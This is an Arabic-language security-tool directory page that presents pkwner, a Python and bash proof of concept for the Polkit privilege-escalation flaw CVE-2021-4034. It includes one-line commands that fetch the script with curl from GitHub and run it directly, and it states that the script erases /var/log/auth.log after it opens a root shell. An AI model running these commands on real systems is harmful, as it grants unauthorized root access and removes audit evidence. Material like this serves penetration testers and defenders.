Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
pkwner — # PoC بلغة python3 و bash لثغرة CVE-2021-4034 من إعداد Kim Schulz | Kitploit
أدوات/GitHubGitHub/kimusan/pkwner
تصعيد الامتيازاتتحليل الثغرات الأمنيةالاستغلالما بعد الاستغلالاختبار الاختراقالفريق الأحمر
GitHubkimusan/pkwner

pkwner

# PoC بلغة python3 و bash لثغرة CVE-2021-4034 من إعداد Kim Schulz

عرض المستودع
237منذ 4 سنواتتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
root@kitploit:~
██████╗ ██╗  ██╗██╗    ██╗███╗   ██╗███████╗██████╗ 
██╔══██╗██║ ██╔╝██║    ██║████╗  ██║██╔════╝██╔══██╗
██████╔╝█████╔╝ ██║ █╗ ██║██╔██╗ ██║█████╗  ██████╔╝
██╔═══╝ ██╔═██╗ ██║███╗██║██║╚██╗██║██╔══╝  ██╔══██╗
██║     ██║  ██╗╚███╔███╔╝██║ ╚████║███████╗██║  ██║
╚═╝     ╚═╝  ╚═╝ ╚══╝╚══╝ ╚═╝  ╚═══╝╚══════╝╚═╝  ╚═╝
A Python3 and a BASH PoC for CVE-2021-4034 by Kim Schulz

مقدمة

هذا هو PoC بسيط لخطأ Polkit المكتشف حديثًا والمسمى PwnKit.

لقد قمت بإنشائه كنص برمجي بلغة bash وأيضًا بلغة python3 - فقط من أجل المتعة.

المشكلة بسيطة جدًا في استغلالها ولكن لها عواقب وخيمة حيث أنها ستمنح بسهولة صلاحيات الجذر (root) على معظم أجهزة Linux حيث يمتلك المهاجم وصولًا كمستخدم محلي.

طريقة التشغيل

هذه النصوص البرمجية تُنفذ بضغطة واحدة، لذا ببساطة قم بتشغيل:

root@kitploit:~
python3 pkwner.py

أو

root@kitploit:~
bash pkwner.sh

يمكنك أيضًا تشغيلها مباشرة من خادم ويب (مثل مستودع GitHub هذا) عبر:

root@kitploit:~
python3 <(curl https://raw.githubusercontent.com/kimusan/pkwner/main/pkwner.py)

أو

root@kitploit:~
source <(curl -s https://raw.githubusercontent.com/kimusan/pkwner/main/pkwner.sh))

في كلتا الحالتين يجب أن يبدو الأمر شيئًا كهذا: alt text و alt text

سينشئ النص البرمجي بعض الملفات والمجلدات ولكنه سينظف بعد نفسه عند فتح قشرة الجذر (root shell) - وسينظف حتى ملف /var/log/auth.log (ولماذا لا).

الاعتمادات

  • Qualys لاكتشاف المشكلة ونشر المعلومات للعامة
  • Andris Raugulis لصنع واحد من أوائل PoCs الذي ألهمني
  • MiscGang لأن misgang@Kalmarunionen رائعون
تنزيل الأداة